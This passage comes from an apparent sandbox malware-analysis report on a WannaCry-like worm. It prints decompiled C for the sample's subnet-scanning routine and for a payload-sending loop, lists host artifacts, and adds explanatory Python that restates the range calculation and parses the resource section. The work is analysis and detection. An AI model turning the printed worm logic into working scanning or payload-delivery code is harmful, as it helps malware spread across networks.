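section (bytes plus the section's RVA) down the type -> name -> language
levels and returns the data entry's bytes.  Added example, not code from the
sample or the sandbox report; build_sample_rsrc() is a constructed stand-in
for the sample's resource section.
"""
import hashlib
import struct

DIR_HEADER = 16    # sizeof(IMAGE_RESOURCE_DIRECTORY)
DIR_ENTRY = 8      # sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY)
HIGH_BIT = 0x80000000

def _entries(rsrc, dir_off):
    """Yield (key, target_offset, is_subdirectory) for one directory level.
    key is a str for named entries and an int for ID entries."""
    n_named, n_ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(n_named + n_ids):
        name, off = struct.unpack_from("<II", rsrc, dir_off + DIR_HEADER + i * DIR_ENTRY)
        if name & HIGH_BIT:                      # offset of an IMAGE_RESOURCE_DIR_STRING_U
            s = name & ~HIGH_BIT
            (length,) = struct.unpack_from("<H", rsrc, s)
            key = rsrc[s + 2:s + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name & 0xFFFF
        yield key, off & ~HIGH_BIT, bool(off & HIGH_BIT)

def _lookup(rsrc, dir_off, key):
    for k, off, is_dir in _entries(rsrc, dir_off):
        if k == key:
            return off, is_dir
    return None

def find_resource(rsrc, rsrc_rva, res_type, res_id):
    """Return the bytes of (res_type, res_id, first language) or None if absent.
    Type and name levels must be directories; the language entry must be a leaf."""
    level = _lookup(rsrc, 0, res_type)
    if level is None or not level[1]:
        return None
    level = _lookup(rsrc, level[0], res_id)
    if level is None or not level[1]:
        return None
    lang = next(_entries(rsrc, level[0]), None)
    if lang is None or lang[2]:
        return None
    data_rva, size = struct.unpack_from("<II", rsrc, lang[1])   # IMAGE_RESOURCE_DATA_ENTRY
    start = data_rva - rsrc_rva                                    # RVA -> offset in section
    if start < 0 or start + size > len(rsrc):
        return None
    return bytes(rsrc[start:start + size])

def build_sample_rsrc(payload, rsrc_rva=0x3000, lang_id=0x409):
    """Constructed .rsrc: root -> named type "R" -> ID 0x727 -> one language -> data."""
    def directory(entries):
        named = sum(1 for name, _ in entries if name & HIGH_BIT)
        blob = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
        return blob + b"".join(struct.pack("<II", name, off) for name, off in entries)
    type_off, lang_off, data_off, str_off = 24, 48, 72, 88   # each directory is 16 + 8 bytes
    payload_off = str_off + 4                                  # 2-byte length + "R" in UTF-16LE
    blob = directory([(HIGH_BIT | str_off, HIGH_BIT | type_off)])
    blob += directory([(0x727, HIGH_BIT | lang_off)])
    blob += directory([(lang_id, data_off)])
    blob += struct.pack("<IIII", rsrc_rva + payload_off, len(payload), 0, 0)
    blob += struct.pack("<H", 1) + "R".encode("utf-16-le")
    return blob + payload

if __name__ == "__main__":
    # Constructed payload standing in for the dropped executable.
    fake_payload = b"MZ" + b"\x00" * 62 + b"constructed stand-in for tasksche.exe"
    rsrc = build_sample_rsrc(fake_payload)
    data = find_resource(rsrc, 0x3000, "R", 0x727)
    print(len(data), "bytes, sha256", hashlib.sha256(data).hexdigest())
```

The rest of the listing gives the host artifacts to look for: MoveFileExA with flag 1 (MOVEFILE_REPLACE_EXISTING) leaves any earlier copy at C:\WINDOWS\qeriuwjhrf, the resolved CreateFileA opens C:\WINDOWS\tasksche.exe with 0x40000000 (GENERIC_WRITE), disposition 2 (CREATE_ALWAYS) and attribute 4 (FILE_ATTRIBUTE_SYSTEM), and the resolved CreateProcessA is called with creation flags 0x8000000 (CREATE_NO_WINDOW), so the dropped executable runs without a console window. The argument construction around " /i" is where the decompiler's quality drops to 36%, so take the exact command line from the strings list rather than from the memcpy calls shown.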

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure; block list omitted). Main path: 409160-40917b GetAdaptersInfo -> 409185-409196 LocalAlloc -> 409198-4091a5 GetAdaptersInfo, then a per-adapter loop 4091d6-4091f3 (inet_addr x2) -> 409212-409247 (call 408e50, call 409470) -> 409249-409257 (inet_addr) with 40926c-409294 (htonl x4, call 408e50) -> 4092a1-4092b7 GetPerAdapterInfo -> 4092bd-4092d2 LocalAlloc -> 4092d8-4092f0 GetPerAdapterInfo -> 4092f9-409307 (inet_addr) with 409329-409351 (htonl x4, call 408e50) -> 40935e-409365 LocalFree; after the loop 409389-4093c2 (call 409680, call 409750) and 4093e9-409469 ending in LocalFree.
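The listing of E00409160 below is the part of the scanner that decides which addresses to probe: for each adapter returned by GetAdaptersInfo it calls inet_addr on the IP string and on the mask string, rejects 0 and INADDR_NONE (0xffffffff), and passes ip & mask and ip | ~mask, i.e. the network and broadcast addresses, to E00408E50. The Python below is an added example, not code from the sample or the sandbox report; it reproduces that range computation over a constructed adapter table so the local blast radius of an infected host can be read off. The GetPerAdapterInfo branch (DNS servers) is not reproduced because its decompilation is too garbled to take a formula from.

```python
"""
Reproduces the target-range computation in E00409160: inet_addr(ip) and
inet_addr(mask) per adapter, skip 0 and INADDR_NONE, then
(ip & mask, ip | ~mask) = (network, broadcast).  Added example, not code from
the sample or the sandbox report.  The adapter table at the bottom is
constructed for this example, not taken from the analysed machine.
"""
import socket
import struct

INADDR_NONE = 0xFFFFFFFF

def inet_addr(text):
    """Mimic inet_addr: returns INADDR_NONE on input it cannot parse.
    Result is host order; the listing works on the network-order value and
    calls htonl later, which gives the same bits because AND/OR/NOT commute
    with the byte swap."""
    try:
        return struct.unpack("!I", socket.inet_aton(text))[0]
    except OSError:
        return INADDR_NONE

def inet_ntoa(value):
    return socket.inet_ntoa(struct.pack("!I", value & 0xFFFFFFFF))

def adapter_range(ip_text, mask_text):
    """(low, high) as host-order ints for one adapter, or None when the sample would skip it."""
    ip, mask = inet_addr(ip_text), inet_addr(mask_text)
    # Same rejection test as the listing: neither value may be 0 or INADDR_NONE.
    if ip in (0, INADDR_NONE) or mask in (0, INADDR_NONE):
        return None
    low = ip & mask
    high = ip | (~mask & 0xFFFFFFFF)
    return low, high

def scan_ranges(adapters):
    """adapters: iterable of (ip, mask) strings -> [(network, broadcast, address_count), ...]."""
    out = []
    for ip_text, mask_text in adapters:
        r = adapter_range(ip_text, mask_text)
        if r is None:
            continue
        low, high = r
        out.append((inet_ntoa(low), inet_ntoa(high), high - low + 1))
    return out

# Constructed adapter table (IP, subnet mask) for this example.
SAMPLE_ADAPTERS = [
    ("192.168.1.77", "255.255.255.0"),   # ordinary /24: 256 addresses
    ("10.20.30.40", "255.255.0.0"),      # /16: 65536 addresses
    ("0.0.0.0", "0.0.0.0"),              # disconnected adapter, skipped
    ("169.254.10.5", "255.255.0.0"),     # link-local /16, still scanned
    ("not-an-ip", "255.255.255.0"),      # inet_addr -> INADDR_NONE, skipped
    ("172.16.5.9", "255.255.255.255"),   # /32 mask equals INADDR_NONE, skipped by the listing's test
]

if __name__ == "__main__":
    for net, bcast, n in scan_ranges(SAMPLE_ADAPTERS):
        print(f"{net} - {bcast}  ({n} addresses)")
```

Two consequences of the rejection test show up in the constructed table: an adapter with a /32 mask is skipped entirely because its mask is bit-identical to INADDR_NONE, and a /16 adapter contributes 65,536 addresses, which is why an infected host's scanning is both slow and easy to spot in flow logs.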
            C-Code - Quality: 58%
            			E00409160() {
            				void* _t50;
            				long _t52;
            				void* _t53;
            				intOrPtr* _t56;
            				intOrPtr* _t57;
            				intOrPtr* _t61;
            				intOrPtr* _t62;
            				signed char _t68;
            				void* _t70;
            				void* _t71;
            				void* _t72;
            				signed char _t73;
            				signed char _t74;
            				signed char _t77;
            				intOrPtr _t81;
            				signed int _t85;
            				signed int _t87;
            				intOrPtr* _t88;
            				intOrPtr _t90;
            				intOrPtr _t92;
            				intOrPtr* _t101;
            				intOrPtr _t102;
            				intOrPtr* _t103;
            				intOrPtr* _t109;
            				intOrPtr _t110;
            				intOrPtr* _t113;
            				intOrPtr _t114;
            				intOrPtr _t115;
            				intOrPtr* _t116;
            				intOrPtr* _t117;
            				void* _t118;
            				void _t119;
            				intOrPtr* _t120;
            				intOrPtr _t121;
            				intOrPtr _t123;
            				void* _t124;
            				void* _t125;
            				signed char _t126;
            				intOrPtr _t128;
            				signed int _t130;
            				void* _t131;
            				void* _t132;
            
            				_t50 = _t131;
            				_push(_t50);
            				_push(0);
            				 *(_t131 + 0xc) = 0;
            				L00409810();
            				if(_t50 != 0x6f) {
            					L5:
            					return 0;
            				} else {
            					_t52 =  *(_t131 + 4);
            					if(_t52 == 0) {
            						goto L5;
            					} else {
            						_t53 = LocalAlloc(0, _t52);
            						_t118 = _t53;
            						 *(_t131 + 8) = _t118;
            						if(_t118 == 0) {
            							goto L5;
            						} else {
            							_push(_t131 + 4);
            							_push(_t118);
            							L00409810();
            							if(_t53 == 0) {
            								goto L8;
            								L9:
            								while(1) {
            									_push(_t109 + 4);
            									L004097D4();
            									 *(_t131 + 0x1c) = _t53;
            									_t53 = _t109 + 0x14;
            									_push(_t53);
            									L004097D4();
            									_t87 =  *(_t131 + 0x1c);
            									if(_t87 != 0xffffffff && _t87 != 0 && _t53 != 0xffffffff && _t53 != 0) {
            									}
            									L15:
            									_t85 = _t53 & _t87;
            									_t130 =  !_t53 | _t87;
            									_push(_t130);
            									E00408E50( *((intOrPtr*)(_t131 + 0x28)), _t85);
            									_t92 =  *((intOrPtr*)(_t131 + 0x38));
            									_t131 = _t131 + 0xc;
            									_push(_t131 + 0x1c);
            									_push(1);
            									_push( *((intOrPtr*)(_t92 + 8)));
            									_t68 = E00409470(_t92);
            									_t116 = _t118 + 0x1d4;
            									if(_t116 != 0) {
            										do {
            											_push(_t116 + 4);
            											L004097D4();
            											_t126 = _t68;
            											if(_t126 != 0xffffffff && _t126 != 0) {
            												_push(_t130);
            												_push(_t85);
            												_t68 = E004090D0(_t68, _t126);
            												_t131 = _t131 + 0xc;
            												if(_t68 == 0) {
            													_push(_t126);
            													L004097F8();
            													_t77 = _t68 | 0x000000ff;
            													_push(_t77);
            													L004097F2();
            													_push(_t77);
            													_push(_t126);
            													L004097F8();
            													_push(_t77 & 0x00000000);
            													L004097F2();
            													_t68 = E00408E50( *((intOrPtr*)(_t131 + 0x2c)), _t77 & 0x00000000);
            													_t131 = _t131 + 0xc;
            												}
            											}
            											_t116 =  *_t116;
            										} while (_t116 != 0);
            										_t118 =  *(_t131 + 0x14);
            									}
            									_t53 = _t131 + 0x10;
            									_push(_t53);
            									_push(0);
            									_push( *((intOrPtr*)(_t118 + 0x19c)));
            									L0040980A();
            									if(_t53 == 0x6f) {
            										_t124 = LocalAlloc(0,  *(_t131 + 0x10));
            										 *(_t131 + 0x20) = _t124;
            										if(_t124 != 0) {
            											_t70 = _t131 + 0x10;
            											_push(_t70);
            											_push(_t124);
            											_push( *((intOrPtr*)( *(_t131 + 0x14) + 0x19c)));
            											L0040980A();
            											if(_t70 != 0) {
            												_t28 = _t124 + 0xc; // 0xc
            												_t117 = _t28;
            												if(_t117 != 0) {
            													do {
            														_t29 = _t117 + 4; // 0x10
            														_t71 = _t29;
            														_push(_t71);
            														L004097D4();
            														_t125 = _t71;
            														if(_t125 != 0xffffffff && _t125 != 0) {
            															_t72 = E00409110(_t125);
            															_t131 = _t131 + 4;
            															if(_t72 != 0) {
            																_push(_t130);
            																_push(_t85);
            																_t73 = E004090D0(_t72, _t125);
            																_t131 = _t131 + 0xc;
            																if(_t73 == 0) {
            																	_push(_t125);
            																	L004097F8();
            																	_t74 = _t73 | 0x000000ff;
            																	_push(_t74);
            																	L004097F2();
            																	_push(_t74);
            																	_push(_t125);
            																	L004097F8();
            																	_push(_t74 & 0x00000000);
            																	L004097F2();
            																	E00408E50( *((intOrPtr*)(_t131 + 0x2c)), _t74 & 0x00000000);
            																	_t131 = _t131 + 0xc;
            																}
            															}
            														}
            														_t117 =  *_t117;
            													} while (_t117 != 0);
            													_t124 =  *(_t131 + 0x20);
            												}
            											}
            										}
            										_t53 = LocalFree(_t124);
            										_t118 =  *(_t131 + 0x14);
            									}
            									_t109 =  *((intOrPtr*)(_t131 + 0x18));
            									L35:
            									_t115 =  *_t109;
            									 *((intOrPtr*)(_t131 + 0x18)) = _t115;
            									if(_t115 != 0) {
            										_t109 =  *((intOrPtr*)(_t131 + 0x18));
            										_push(_t109 + 4);
            										L004097D4();
            										 *(_t131 + 0x1c) = _t53;
            										_t53 = _t109 + 0x14;
            										_push(_t53);
            										L004097D4();
            										_t87 =  *(_t131 + 0x1c);
            										if(_t87 != 0xffffffff && _t87 != 0 && _t53 != 0xffffffff && _t53 != 0) {
            										}
            										goto L35;
            									}
            									break;
            								}
            								L36:
            								_t119 =  *_t118;
            								 *(_t131 + 0x14) = _t119;
            								if(_t119 != 0) {
            									_t118 =  *(_t131 + 0x14);
            									L8:
            									_t6 = _t118 + 0x1ac; // 0x1ac
            									_t109 = _t6;
            									 *((intOrPtr*)(_t131 + 0x18)) = _t109;
            									if(_t109 != 0) {
            										goto L9;
            									}
            									goto L36;
            								}
            								_t128 =  *((intOrPtr*)(_t131 + 0x28));
            								_push(_t119);
            								_t81 =  *((intOrPtr*)(_t128 + 8));
            								_t110 =  *((intOrPtr*)(_t128 + 4));
            								_push(_t81);
            								_push(_t110);
            								_t100 = _t81 - _t110 & 0xfffffffc;
            								if((_t81 - _t110 & 0xfffffffc) > 0x40) {
            									E00409680(_t100);
            									_t120 = _t110 + 0x40;
            									_push(0);
            									E00409750(_t110, _t120);
            									_t132 = _t131 + 0x18;
            									while(_t120 != _t81) {
            										_t114 =  *_t120;
            										_t90 =  *((intOrPtr*)(_t120 - 4));
            										_t62 = _t120 - 4;
            										_t103 = _t120;
            										while(_t114 < _t90) {
            											 *_t103 = _t90;
            											_t90 =  *((intOrPtr*)(_t62 - 4));
            											_t103 = _t62;
            											_t62 = _t62 - 4;
            										}
            										_t120 = _t120 + 4;
            										 *_t103 = _t114;
            									}
            								} else {
            									E00409750();
            									_t132 = _t131 + 0xc;
            								}
            								_t101 =  *((intOrPtr*)(_t128 + 8));
            								_t56 =  *((intOrPtr*)(_t128 + 4));
            								_t88 = _t56;
            								if(_t56 == _t101) {
            									L47:
            									_t88 = _t101;
            								} else {
            									while(1) {
            										_t56 = _t56 + 4;
            										if(_t56 == _t101) {
            											goto L47;
            										}
            										if( *_t88 ==  *_t56) {
            											if(_t88 != _t101) {
            												_t113 = _t88;
            												_t88 = _t88 + 4;
            												_t61 = _t88;
            												while(_t61 != _t101) {
            													_t123 =  *_t61;
            													if( *_t113 != _t123) {
            														 *_t88 = _t123;
            														_t113 = _t61;
            														_t88 = _t88 + 4;
            													}
            													_t61 = _t61 + 4;
            												}
            											}
            										} else {
            											_t88 = _t56;
            											continue;
            										}
            										goto L53;
            									}
            									goto L47;
            								}
            								L53:
            								_t121 =  *((intOrPtr*)(_t128 + 8));
            								_t57 = _t101;
            								if(_t101 != _t121) {
            									do {
            										_t102 =  *_t57;
            										_t57 = _t57 + 4;
            										 *_t88 = _t102;
            										_t88 = _t88 + 4;
            									} while (_t57 != _t121);
            								}
            								 *((intOrPtr*)(_t128 + 8)) = _t88;
            								 *((intOrPtr*)(_t132 + 0x28)) =  *((intOrPtr*)(_t128 + 8));
            								LocalFree( *(_t132 + 0x14));
            								return 1;
            							} else {
            								LocalFree(_t118);
            								goto L5;
            							}
            						}
            					}
            				}
			}

            Instruction addresses for the listing above span 0x00409163-0x00409469 (the per-line address column lost its alignment to the C-code lines during extraction and is not reproduced).

            APIs
            • GetAdaptersInfo.IPHLPAPI ref: 00409173
            • LocalAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 00409188
            • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0040919E
            • LocalFree.KERNEL32(00000000,00000000,?), ref: 004091A8
            • inet_addr.WS2_32(?), ref: 004091DA
            • inet_addr.WS2_32(?), ref: 004091E7
            • inet_addr.WS2_32(?), ref: 0040924D
            • htonl.WS2_32(00000000), ref: 0040926D
            • htonl.WS2_32(00000000), ref: 00409275
            • htonl.WS2_32(00000000), ref: 0040927C
            • htonl.WS2_32(00000000), ref: 00409284
            • GetPerAdapterInfo.IPHLPAPI(?,00000000,?), ref: 004092AF
            • LocalAlloc.KERNEL32(00000000,?,?,00000001,?,?,?,00000000,?), ref: 004092C4
            • GetPerAdapterInfo.IPHLPAPI(?,00000000,?), ref: 004092E9
            • inet_addr.WS2_32(00000010), ref: 004092FD
            • htonl.WS2_32(00000000), ref: 0040932A
            • htonl.WS2_32(00000000), ref: 00409332
            • htonl.WS2_32(00000000), ref: 00409339
            • htonl.WS2_32(00000000), ref: 00409341
            • LocalFree.KERNEL32(00000000,?,?,00000000,?), ref: 0040935F
            • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,?,00000000,?), ref: 00409457
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: htonl$Local$Infoinet_addr$Free$AdapterAdaptersAlloc
            • String ID:
            • API String ID: 2932872762-0
            • Opcode ID: c11bd2ab7724a74c24a0033fabf222a027c31e263815c656df1c756183d4ce29
            • Instruction ID: db8ce7f248b8b80c9efd5a41f97dd348cfc29eb1c395b7b9fc731d5542502a59
            • Opcode Fuzzy Hash: c11bd2ab7724a74c24a0033fabf222a027c31e263815c656df1c756183d4ce29
            • Instruction Fuzzy Hash: FA91C6726042119BD714DE24C880A6F73A9AF89714F19493EFC55B73C3D739ED028B9A
            Uniqueness

            Uniqueness Score: -1.00%
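The function above builds a list of address ranges from the adapter table: for each adapter it takes inet_addr of the IpAddress and IpMask strings in IpAddressList (+0x1ac), records ip & mask (the network address) and ip | ~mask (the broadcast address) through E00408E50, walks GatewayList (+0x1d4) and the DNS server list returned by GetPerAdapterInfo (+0xc), and finally sorts and de-duplicates the vector (the insertion-sort and compaction loops at the end are the std::sort/std::unique pattern). The Python below is an added example, not the report's or the sample's code, that restates that range computation in host byte order so a practitioner can see which ranges the function produces for a given adapter configuration. Two points are my reading of the listing rather than something the page states: that E004090D0 is an in-range test against the adapter's own range, and that the htonl(...) | 0xff sequence in the gateway and DNS paths adds the surrounding /24 of an off-subnet address. The E00409110 pre-check on DNS addresses is not modelled, and the adapter data is constructed.

```python
import ipaddress
import socket
import struct

# Constructed sample adapter table (not from the report): one entry per adapter as
# (IpAddress, IpMask, GatewayList, DnsServerList), the strings the decompiled
# function hands to inet_addr. The third entry duplicates the second on purpose
# to exercise the sort + unique tail.
SAMPLE_ADAPTERS = [
    ("10.1.2.37", "255.255.255.0", ["10.1.2.1"], ["10.1.2.1", "8.8.8.8"]),
    ("192.168.50.9", "255.255.240.0", ["192.168.48.1"], ["192.168.48.1"]),
    ("192.168.50.9", "255.255.240.0", [], []),
]

INADDR_NONE = 0xFFFFFFFF  # inet_addr's error value; the listing skips 0 and this


def inet_addr(text: str) -> int:
    """The DWORD inet_addr() returns: network byte order held in a little-endian register."""
    try:
        return struct.unpack("<I", socket.inet_aton(text))[0]
    except OSError:
        return INADDR_NONE


def htonl(value: int) -> int:
    """Byte swap, as htonl/ntohl on x86; turns an inet_addr DWORD into host order."""
    return struct.unpack(">I", struct.pack("<I", value))[0]


def adapter_range(ip: str, mask: str) -> tuple[int, int]:
    """net = ip & mask, bcast = ip | ~mask on the raw inet_addr DWORDs, exactly as the
    decompilation computes them, then swapped to host order so ranges compare numerically."""
    ip_n, mask_n = inet_addr(ip), inet_addr(mask)
    net = ip_n & mask_n
    bcast = ip_n | (~mask_n & 0xFFFFFFFF)
    return htonl(net), htonl(bcast)


def slash24_range(addr: str) -> tuple[int, int]:
    """Assumption: the htonl(x) | 0xff step means an off-subnet gateway or DNS
    address contributes its surrounding /24."""
    hi = htonl(inet_addr(addr)) | 0xFF
    return hi & 0xFFFFFF00, hi


def in_range(value: int, lo: int, hi: int) -> bool:
    """Assumed meaning of E004090D0(addr, net, bcast): is addr inside [net, bcast]."""
    return lo <= value <= hi


def build_ranges(adapters=SAMPLE_ADAPTERS) -> list[tuple[int, int]]:
    """Collect (network, broadcast) pairs per adapter plus /24s for off-subnet
    gateway/DNS addresses, then sort and de-duplicate like the function's tail."""
    ranges: list[tuple[int, int]] = []
    for ip, mask, gateways, dns_servers in adapters:
        ip_n, mask_n = inet_addr(ip), inet_addr(mask)
        if ip_n in (0, INADDR_NONE) or mask_n in (0, INADDR_NONE):
            continue  # the `!= 0xffffffff && != 0` guards in the listing
        lo, hi = adapter_range(ip, mask)
        ranges.append((lo, hi))
        for extra in gateways + dns_servers:
            extra_n = inet_addr(extra)
            if extra_n in (0, INADDR_NONE):
                continue
            if not in_range(htonl(extra_n), lo, hi):
                ranges.append(slash24_range(extra))
    return sorted(set(ranges))


def describe(ranges) -> list[str]:
    """Dotted-quad form of each range, for reading the result."""
    return [f"{ipaddress.IPv4Address(lo)}-{ipaddress.IPv4Address(hi)}" for lo, hi in ranges]


if __name__ == "__main__":
    for line in describe(build_ranges()):
        print(line)
```

Note that the real code pushes the raw inet_addr DWORDs into the vector and only applies htonl on the gateway/DNS path; this restatement works in host order throughout so that the sorted output is readable, which does not change which ranges are produced.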

            Control-flow Graph

            Control-flow graph (rendered graph omitted; the executed/not-executed colouring is not recoverable, the block structure is): 26 basic blocks covering 406f50-40729e. Entry 406f50 (call 409860) leads to GlobalAlloc at 406fe4, whose failure edge goes straight to the return block 407292. The chunk loop is 40710b-407182 (call 406f00, send) -> 407184 (recv) -> 40719e -> 4071a8 -> 407107 -> 40710b; every failed check inside it exits to 4071c7. From 4071c7 control either goes directly to 407287 (GlobalFree) or through the tail 4071cf-407270 (htons, call 406f00, send) -> 407272 (recv) -> 407287, and 407287 -> 407292.
            C-Code - Quality: 77%
            			E00406F50(void* __ecx, void* __eflags) {
            				void* _t100;
            				void* _t103;
            				void* _t109;
            				short _t116;
            				signed int _t121;
            				void* _t122;
            				void* _t128;
            				intOrPtr _t130;
            				signed int _t131;
            				signed int _t133;
            				signed int _t134;
            				signed int _t141;
            				signed int _t142;
            				signed int _t147;
            				signed int _t150;
            				signed int _t151;
            				signed int _t163;
            				signed int _t178;
            				signed int _t181;
            				void* _t219;
            				void* _t220;
            				signed int _t222;
            				void* _t223;
            				intOrPtr _t224;
            				intOrPtr _t226;
            				signed int _t227;
            				signed int _t228;
            				unsigned int _t229;
            				void* _t233;
            				void* _t234;
            				void* _t235;
            				void* _t238;
            				void* _t239;
            				void* _t240;
            				void* _t241;
            				void* _t244;
            				signed int _t249;
            
            				E00409860(0x20e4, __ecx);
            				 *((char*)(_t233 + 0x2c)) = 0;
            				memset(_t233 + 0x2d, 0, 0x431 << 2);
            				_t234 = _t233 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				 *((char*)(_t234 + 0x10f4)) = 0;
            				memset(_t234 + 0x10f5, 0, 0x3ff << 2);
            				_t235 = _t234 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				 *((intOrPtr*)(_t235 + 0x10)) = 0;
            				 *((intOrPtr*)(_t235 + 0x14)) = 0;
            				 *((intOrPtr*)(_t235 + 0x11)) = 0;
            				 *((intOrPtr*)(_t235 + 0x18)) = 0;
            				 *((char*)(_t235 + 0x10)) = 0;
            				 *((intOrPtr*)(_t235 + 0x15)) = 0;
            				 *((short*)(_t235 + 0x19)) = 0;
            				 *((char*)(_t235 + 0x1b)) = 0;
            				if( *((intOrPtr*)(_t235 + 0x20fc)) == 0) {
            					_t219 =  *0x70f868;
            					_t131 = 0x1800;
            					_t227 = 0x50d800;
            				} else {
            					_t219 =  *0x70f864;
            					_t131 = 0x1305;
            					_t227 = 0x506000;
            				}
            				_t17 = _t227 + 0xc; // 0x180c
            				_t100 = GlobalAlloc(0x40, _t131 + _t17);
            				 *(_t235 + 0x20) = _t100;
            				if(_t100 == 0) {
            					L25:
            					return 0;
            				} else {
            					_t141 = _t227;
            					_t142 = _t141 >> 2;
            					memcpy(_t100 + _t131, _t219, _t142 << 2);
            					_t103 = memcpy(_t219 + _t142 + _t142, _t219, _t141 & 0x00000003);
            					_t238 = _t235 + 0x18;
            					_t147 = _t131 + _t227;
            					_t178 = _t147 & 0x80000003;
            					if(_t178 < 0) {
            						_t178 = (_t178 - 0x00000001 | 0xfffffffc) + 1;
            						_t249 = _t178;
            					}
            					if(_t249 != 0) {
            						asm("cdq");
            						 *(_t238 + 0x1c) = 4 + (_t147 + (_t178 & 0x00000003) >> 2) * 4;
            						_t103 =  *(_t238 + 0x20);
            					} else {
            						 *(_t238 + 0x1c) = _t147;
            					}
            					if( *((intOrPtr*)(_t238 + 0x20fc)) == 0) {
            						_t31 = _t227 + 0xf8a; // 0x50e78a
            						_t220 = 0x42fa60;
            						 *0x4302ce = _t31;
            						 *(_t131 + 0x42fa58) = _t227;
            						 *((intOrPtr*)(_t131 + 0x42fa5c)) = 1;
            						_t150 = _t131;
            					} else {
            						_t28 = _t227 + 0xd70; // 0x50e570
            						_t220 = 0x42e758;
            						 *0x42ece9 = _t28;
            						 *(_t131 + 0x42e750) = _t227;
            						 *((intOrPtr*)(_t131 + 0x42e754)) = 1;
            						_t150 = _t131;
            					}
            					_t151 = _t150 >> 2;
            					memcpy(_t103, _t220, _t151 << 2);
            					_t239 = _t238 + 0xc;
            					_t181 =  *(_t239 + 0x2100);
            					_t109 = memcpy(_t220 + _t151 + _t151, _t220, _t150 & 0x00000003);
            					_t240 = _t239 + 0xc;
            					E00406F00(_t181, _t109,  *((intOrPtr*)(_t240 + 0x1c)));
            					_t228 =  *(_t240 + 0x28);
            					_t241 = _t240 + 0xc;
            					asm("cdq");
            					_t133 = _t228 + (_t181 & 0x00000fff) >> 0xc;
            					_t229 = _t228 & 0x80000fff;
            					if(_t229 < 0) {
            						_t229 = (_t229 - 0x00000001 | 0xfffff000) + 1;
            					}
            					memcpy(_t241 + 0x2c, 0x42e710, 0x11 << 2);
            					_t235 = _t241 + 0xc;
            					asm("movsw");
            					_t222 = 0;
            					 *((intOrPtr*)(_t235 + 0x28)) = 0;
            					if(_t133 <= 0) {
            						L21:
            						if(_t229 > 0) {
            							_t116 = _t229 + 0x4e;
            							_push(_t116);
            							L004097CE();
            							 *((short*)(_t235 + 0x2e)) = _t116;
            							 *((short*)(_t235 + 0x6f)) = _t229 + 0xd;
            							_t134 = _t133 << 0xc;
            							 *(_t235 + 0x5f) = _t229;
            							 *(_t235 + 0x73) = _t229;
            							 *(_t235 + 0x20) = _t229;
            							 *(_t235 + 0x24) = _t134;
            							E00406F00( *((intOrPtr*)(_t235 + 0x2100)), _t235 + 0x10, 0xc);
            							 *(_t235 + 0x86) =  *(_t235 + 0x24);
            							 *((intOrPtr*)(_t235 + 0x7e)) =  *((intOrPtr*)(_t235 + 0x1c));
            							 *(_t235 + 0x82) =  *(_t235 + 0x20);
            							_t223 = _t134 +  *((intOrPtr*)(_t235 + 0x2c));
            							_t163 = _t229 >> 2;
            							_t121 = memcpy(_t235 + 0x8a, _t223, _t163 << 2);
            							_push(0);
            							_t122 = memcpy(_t223 + _t163 + _t163, _t223, _t121 & 0x00000003);
            							_t235 = _t235 + 0x24;
            							_t224 =  *((intOrPtr*)(_t235 + 0x20fc));
            							_push(_t229 + 0x52);
            							_push(_t235 + 0x30);
            							_push(_t224);
            							L004097BC();
            							if(_t122 != 0xffffffff) {
            								_push(0);
            								_push(0x1000);
            								_push(_t235 + 0x10f8);
            								_push(_t224);
            								L004097B6();
            							}
            						}
            						GlobalFree( *(_t235 + 0x20));
            						goto L25;
            					} else {
            						 *(_t235 + 0x24) = 0;
            						while(1) {
            							 *((intOrPtr*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0x1c));
            							 *(_t235 + 0x20) = 0x1000;
            							 *(_t235 + 0x24) = _t222;
            							E00406F00( *((intOrPtr*)(_t235 + 0x2100)), _t235 + 0x10, 0xc);
            							 *((intOrPtr*)(_t235 + 0x7e)) =  *((intOrPtr*)(_t235 + 0x1c));
            							 *(_t235 + 0x82) =  *(_t235 + 0x20);
            							_t244 = _t235 + 0xc;
            							 *(_t244 + 0x7a) =  *(_t235 + 0x24);
            							_t128 = memcpy(_t235 + 0x8a, _t222 +  *((intOrPtr*)(_t235 + 0x2c)), 0x400 << 2);
            							_t235 = _t244 + 0xc;
            							_t226 =  *((intOrPtr*)(_t235 + 0x20f8));
            							_push(0);
            							_push(0x1052);
            							_push(_t235 + 0x30);
            							_push(_t226);
            							L004097BC();
            							if(_t128 == 0xffffffff) {
            								goto L21;
            							}
            							_push(0);
            							_push(0x1000);
            							_push(_t235 + 0x10f8);
            							_push(_t226);
            							L004097B6();
            							if(_t128 != 0xffffffff &&  *((char*)(_t235 + 0x1116)) == 0x52) {
            								_t130 =  *((intOrPtr*)(_t235 + 0x28)) + 1;
            								 *((intOrPtr*)(_t235 + 0x28)) = _t130;
            								 *(_t235 + 0x24) = 0x1000 +  *(_t235 + 0x24);
            								if(_t130 < _t133) {
            									_t222 =  *(_t235 + 0x24);
            									continue;
            								}
            							}
            							goto L21;
            						}
            						goto L21;
            					}
            				}
			}

            Instruction addresses for the listing above span 0x00406f55-0x0040729e (the per-line address column lost its alignment to the C-code lines during extraction and is not reproduced).

            APIs
            • GlobalAlloc.KERNEL32(00000040,0000180C), ref: 00406FEB
